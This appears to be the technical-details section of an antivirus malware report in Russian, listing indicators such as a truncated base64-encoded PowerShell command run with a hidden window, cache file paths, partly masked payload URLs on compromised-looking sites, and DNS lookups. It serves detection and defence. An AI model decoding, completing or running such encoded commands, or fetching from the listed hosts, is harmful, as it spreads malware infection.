Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGwAdwBmAHUAbwBmAHkAdgA9ACcAVQBxAGoAdQB2AG0AaABuAGkAeQBtAGkAcQAnADsAJABPAGwAdgB1AGUAdQBzAHMAIAA9ACAAJwAxADIANwAnADsAJABDAHEAaQBwAHUAagB2AGIAYQBnAGUAPQAnAEMAawB3AHkAZgB0AHUAbAB6ACcAOwAkAE...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://li#####aviationusa.com/wp-content/XQ98614/
- http://st######svitthalwadi.com/calendar/multifunctional_mtW4puO7l_vM0hbZZT9/Gx6D/
- http://www.az###ehjo.com/wp-admin/IZP179/
- DNS ASK ok##c.com
- DNS ASK li#####aviationusa.com
- DNS ASK st######svitthalwadi.com
- DNS ASK az###ehjo.com
- DNS ASK se###yltd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGwAdwBmAHUAbwBmAHkAdgA9ACcAVQBxAGoAdQB2AG0AaABuAGkAeQBtAGkAcQAnADsAJABPAGwAdgB1AGUAdQBzAHMAIAA9ACAAJwAxADIANwAnADsAJABDAHEAaQBwAHUAagB2AGIAYQBnAGUAPQAnAEMAawB3AHkAZgB0AHUAbAB6ACcAOwAkAE...' (со скрытым окном)